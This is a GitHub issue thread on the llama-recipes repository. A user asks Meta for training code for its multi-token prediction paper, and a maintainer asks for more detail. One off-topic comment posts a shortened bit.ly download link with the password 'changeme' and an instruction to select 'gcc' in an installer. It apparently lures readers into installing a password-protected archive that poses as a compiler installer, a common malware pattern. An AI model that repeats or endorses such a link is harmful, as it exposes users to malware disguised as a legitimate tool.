### ISSUE TITLE
Better & Faster Large Language Models via Multi-token Prediction

### ISSUE THREAD

**Issue by vgoklani** [meta-llama/llama-recipes#647]
### 🚀 The feature, motivation and pitch

Would love to see an implementation of the training code for this paper:

https://arxiv.org/abs/2404.19737

A lot of teams would benefit from seeing an official implementation of this paper/code. This way we can properly evaluate the training process and make it for efficient.

### Alternatives

Medusa...

### Additional context

The paper is from meta...

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by init27** [comment]
Thanks for opening the issue!

Can you please share some more details on the paper, a TL;DR of the recommendation and results and why you think its promising?
